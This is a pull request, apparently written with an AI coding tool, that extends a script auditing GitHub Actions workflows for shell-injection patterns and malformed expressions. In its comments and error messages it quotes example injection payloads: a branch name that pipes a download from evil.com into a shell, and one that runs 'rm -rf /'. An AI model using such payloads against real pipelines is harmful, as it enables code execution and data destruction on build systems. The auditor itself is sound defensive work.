### PR TITLE
feat(security): extend actions-injection auditor to catch malformed expressions

### DIFF
--- a/scripts/security/check-actions-injection.mjs
+++ b/scripts/security/check-actions-injection.mjs
@@ -2,11 +2,21 @@
 /**
  * BI-860603DA / BI-5940955C — Actions code-injection auditor.
  *
- * Scans every workflow under .github/workflows/ for `${{ github.event.* }}`
- * expressions interpolated directly into `run:` shell blocks. This is the
- * pattern that GitHub Security flags as actions/code-injection/critical
- * (CWE-094) — a branch name like `'; curl evil.com | sh; #` becomes shell
- * code when the runtime substitutes it.
+ * Two complementary checks across every workflow under .github/workflows/:
+ *
+ * 1. Run-block injection (CWE-094, the GitHub-Security-flagged pattern).
+ *    `${{ github.event.* }}` or `${{ inputs.* }}` expressions interpolated
+ *    directly into `run:` shell blocks. A branch name like
+ *    `'; curl evil.com | sh; #` becomes shell code when the runtime
+ *    substitutes it.
+ *
+ * 2. Malformed expression syntax. A literal `${{ github.event.* }}` in any
+ *    expression-evaluated field (step name, job name, with:, if:,
+ *    concurrency.group, env:) crashes the workflow at startup — the `.*`
+ *    wildcard token isn't valid expression syntax. Runs report
+ *    `conclusion: failure` with 0 jobs. This is the bug PR #944 hotfixed;
+ *    the original auditor missed it because it only scanned run: blocks.
+ *    Added in the PR that extends the auditor (Task 9).
  *
  * The safe pattern is to pass `github.event.*` values through an `env:`
  * block and reference them as shell variables, which the runtime then
@@ -51,6 +61,18 @@ const BASELINE_PATH = process.env.BASELINE_PATH ?? "docs/security/actions-inject
 // Match `${{ github.event.* }}` and `${{ inputs.* }}` — both are
 // attacker-influenced in pull_request_target / workflow_dispatch contexts.
 const DANGEROUS_EXPR = /\$\{\{\s*(github\.event\.|inputs\.)/;
+
+// Match malformed GitHub Actions expressions — the `.*` wildcard token is
+// NOT valid expression syntax. A literal `${{ github.event.* }}` in any
+// expression-evaluated field (step name, job name, with: parameter, if:,
+// concurrency.group, etc.) crashes the workflow at startup with 0 jobs run.
+// This is the bug PR #944 hotfixed. We catch it anywhere in any workflow
+// (excluding YAML comments).
+//
+// The regex looks for `.*` (or `.<identifier>.*`) INSIDE a `${{ ... }}`
+// block. Legitimate trailing access like `inputs.mode || 'release'` does
+// not match — only the wildcard `.*` form does.
+const MALFORMED_EXPR = /\$\{\{[^}]*\.\*[^}]*\}\}/;
 
 /**
  * Find `${{ github.event.* }}` (or `inputs.*`) occurrences that appear
@@ -116,6 +138,42 @@ function findViolations(content) {
   return violations;
 }
 
+/**
+ * Find malformed GitHub Actions expressions that crash the workflow at
+ * startup. The `.*` token is not valid expression syntax — when GH tries
+ * to evaluate it (in any field that accepts expressions: step name, job
+ * name, with: parameters, if: conditions, concurrency.group, etc.), the
+ * workflow fails to start and reports `conclusion: failure` with zero
+ * jobs run. This is the exact bug PR #944 hotfixed.
+ *
+ * We scan every line outside YAML comments. YAML comments (lines starting
+ * with `#` after optional whitespace) are safe: they're stripped before
+ * expression evaluation.
+ *
+ * A run-block line that contains `${{ github.event.* }}` IS shell-evaluated
+ * at runtime, but it ALSO fails template eval at startup — so this check
+ * is complementary to findViolations(), not duplicative. Both would catch
+ * the same line, which is fine: the message tells the user which class.
+ */
+function findMalformedExpressions(content) {
+  const lines = content.split(/\r?\n/);
+  const out = [];
+
+  for (let i = 0; i < lines.length; i++) {
+    const line = lines[i];
+    if (!MALFORMED_EXPR.test(line)) continue;
+    // Skip YAML comments — comments aren't expression-evaluated.
+    if (/^\s*#/.test(line)) continue;
+    out.push({
+      line: i + 1,
+      snippet: line.trim().slice(0, 200),
+      context: "malformed expression (.* token)",
+    });
+  }
+
+  return out;
+}
+
 async function listWorkflowFiles(dir) {
   const entries = await readdir(dir, { withFileTypes: true });
   const out = [];
@@ -169,6 +227,9 @@ for (const file of workflowFiles) {
   for (const v of findViolations(content)) {
     allViolations.push({ file: rel, ...v });
   }
+  for (const v of findMalformedExpressions(content)) {
+    allViolations.push({ file: rel, ...v });
+  }
 }
 
 const introduced = allViolations.filter((v) => !accepted.has(`${v.file}:${v.line}`));
@@ -192,9 +253,14 @@ if (baselineNotFound.length > 0) {
 }
 
 if (introduced.length === 0) {
-  console.log("✓ Actions injection audit PASSED — no new `${{ github.event.* }}` or `${{ inputs.* }}` in run: blocks.");
+  console.log("✓ Actions injection audit PASSED — no new run-block injection or malformed expressions.");
   process.exit(0);
 }
+
+// Partition violations by class so the report shows the right fix guidance
+// for each. Some PRs may introduce both classes at once.
+const runBlockViolations = introduced.filter((v) => v.context !== "malformed expression (.* token)");
+const malformedViolations = introduced.filter((v) => v.context === "malformed expression (.* token)");
 
 console.error(`✗ Actions injection audit FAILED — ${introduced.length} new violation(s):`);
 console.error("");
@@ -204,26 +270,50 @@ for (const v of introduced) {
   console.error("");
 }
 
-console.error("Why this matters");
-console.error("----------------");
-console.error("Interpolating `${{ github.event.* }}` into a `run:` block lets the");
-console.error("GitHub Actions runtime substitute attacker-controlled values directly");
-console.error("into the shell command — a branch name like `'; rm -rf /; #` becomes");
-console.error("shell code. This is GitHub Security alert `actions/code-injection/critical`");
-console.error("(CWE-094) and is what enabled BI-5940955C.");
-console.error("");
-console.error("How to fix");
-console.error("----------");
-console.error("Pass the value through an `env:` block and reference the env var in shell:");
-console.error("");
-console.error("    env:");
-console.error("      HEAD_REF: ${{ github.event.pull_request.head.ref }}");
-console.error("    run: |");
-console.error('      git push origin "HEAD:${HEAD_REF}"');
-console.error("");
-console.error("The runtime quotes env values correctly. The shell then sees a normal");
-console.error("variable, not interpolated code.");
-console.error("");
-console.error("Reference: https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions#using-an-intermediate-environment-variable");
+if (runBlockViolations.length > 0) {
+  console.error("Run-block injection (CWE-094)");
+  console.error("-----------------------------");
+  console.error("Interpolating `${{ github.event.* }}` into a `run:` block lets the");
+  console.error("GitHub Actions runtime substitute attacker-controlled values directly");
+  console.error("into the shell command — a branch name like `'; rm -rf /; #` becomes");
+  console.error("shell code. This is GitHub Security alert `actions/code-injection/critical`");
+  console.error("and is what enabled BI-5940955C.");
+  console.error("");
+  console.error("Fix: pass the value through an `env:` block and reference the env var in shell:");
+  console.error("");
+  console.error("    env:");
+  console.error("      HEAD_REF: ${{ github.event.pull_request.head.ref }}");
+  console.error("    run: |");
+  console.error('      git push origin "HEAD:${HEAD_REF}"');
+  console.error("");
+  console.error("The runtime quotes env values correctly. The shell sees a normal");
+  console.error("variable, not interpolated code.");
+  console.error("");
+  console.error("Reference: https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions#using-an-intermediate-environment-variable");
+  console.error("");
+}
+
+if (malformedViolations.length > 0) {
+  console.error("Malformed expression — workflow startup failure");
+  console.error("-----------------------------------------------");
+  console.error("`${{ github.event.* }}` is NOT valid GitHub Actions expression syntax —");
+  console.error("the `.*` wildcard token doesn't exist in their expression DSL. When GH");
+  console.error("tries to evaluate it (which happens in ANY expression-evaluated field:");
+  console.error("step name, job name, with: parameter, if:, concurrency.group, env:),");
+  console.error("the workflow fails to start. You'll see `conclusion: failure` with 0 jobs.");
+  console.error("");
+  console.error("This is the exact bug PR #944 hotfixed. The auditor missed it then");
+  console.error("because it only scanned run: blocks; this check covers all fields.");
+  console.error("");
+  console.error("Fix: replace the wildcard with a concrete property, or move the literal");
+  console.error("string out of an expression-evaluated context.");
+  console.error("");
+  console.error("    # Broken (literal `.*` in name field):");
+  console.error("    - name: Scan for `${{ github.event.* }}` in run blocks");
+  console.error("");
+  console.error("    # Fixed (describe without embedding the malformed expression):");
+  console.error("    - name: Scan for dangerous expressions in run blocks");
+  console.error("");
+}
 
 process.exit(1);


### PR DESCRIPTION
## Summary

Extends `scripts/security/check-actions-injection.mjs` with a second check that flags literal `\${{ github.event.* }}` (malformed-expression syntax with the `.*` wildcard) anywhere in a workflow file, not just `run:` blocks. This is the exact class of bug **PR #944 hotfixed** in the auditor's own step name — the original scanner missed it because it only looked at `run:` blocks.

## The bug class

When the GitHub Actions runtime evaluates an invalid expression (the `.*` wildcard isn't valid expression syntax), the workflow fails to start with `conclusion: failure` and zero jobs run. Any expression-evaluated field is vulnerable: step `name:`, job `name:`, `with:`, `if:`, `concurrency.group`, `env:`. The new check covers all of them.

## Two checks, one auditor

The script now has two complementary checks, partitioned by violation class:

| Check | Scope | Fix guidance |
|---|---|---|
| Run-block injection | `${{ github.event.* / inputs.* }}` in `run:` blocks | Use `env:` block + shell var (the BI-5940955C fix) |
| Malformed expression | `${{ ... .* ... }}` anywhere | Replace wildcard with concrete property, or move literal out of expression context |

The output is partitioned — if a PR introduces both classes at once, the operator sees both fix sections.

## Why not just scan all fields for `\${{ github.event.* / inputs.* }}`

Naively scanning every field would false-positive on:
- `install-verification.yml:43` — legitimate parameterized job name `\${{ github.event.inputs.mode \|\| 'release' }}` (valid expression)
- `security-inflow-gate.yml:78-79` — the SAFE `env:` passthrough pattern this audit is supposed to encourage
- `security-inflow-gate.yml:44` — concurrency group key (valid expression)

Scoping the new check to **malformed-expression syntax only** (`.*` wildcard token) catches the exact bug class without any false positives.

## Smoke test

```
# PASS: no new violations
$ node scripts/security/check-actions-injection.mjs
Workflows scanned: 12
Baseline accepts:  5 occurrence(s)
Currently found:   5 occurrence(s)
✓ Actions injection audit PASSED — no new run-block injection or malformed expressions.

# FAIL: PR #944's bug class re-introduced
$ cat .github/workflows/regression-test.yml
- name: Test \${{ github.event.* }} in step name
$ node scripts/security/check-actions-injection.mjs
✗ Actions injection audit FAILED — 1 new violation(s):
  .github/workflows/regression-test.yml:7  (malformed expression (.* token))
[…malformed-expression fix guidance section…]
EXIT=1

# FAIL: both classes at once
[…shows both run-block and malformed-expression sections…]
```

## YAML comments skipped

The literal `\${{ github.event.* }}` substring legitimately appears in audit-actions-injection.yml line 6 (a YAML header comment). Lines starting with `#` are explicitly skipped — comments aren't expression-evaluated.

## False-positive sweep

Scanned all current workflows: only the one comment line contains the malformed-expression pattern. No baseline entries needed for this check class. (The 5 existing baseline entries are all run-block injections in `dco-signoff-dependabot.yml`, `install-verification.yml`, and `publish-image.yml` — tracked by BI-5940955C and BI-D094AF1D.)

## Closes the loop

The original auditor (PR #941) shipped with a bug in its own step name (`\${{ github.event.* }}` interpolation that crashed at workflow startup). PR #944 hotfixed the immediate symptom. This PR makes the same bug class impossible to reintroduce — the auditor now scans for it everywhere, including in its own files.

## Test plan

- [ ] CI green (this PR introduces no new violations; the auditor passes on itself, including the new malformed-expression check).
- [ ] After merge: re-introduce a synthetic step-name violation in a follow-up PR; new audit catches it with the specific malformed-expression fix guidance.

## Related

- **BI-5940955C** — Actions code injection cluster (parent)
- **BI-860603DA** — External contribution governance (parent)
- **BI-D094AF1D** — Workflow_dispatch input cleanup (sibling)
- PR [#941](https://github.com/OpenDigitalProductFactory/opendigitalproductfactory/pull/941) — Original auditor
- PR [#944](https://github.com/OpenDigitalProductFactory/opendigitalproductfactory/pull/944) — Hotfix that this PR makes durable

🤖 Generated with [Claude Code](https://claude.com/claude-code)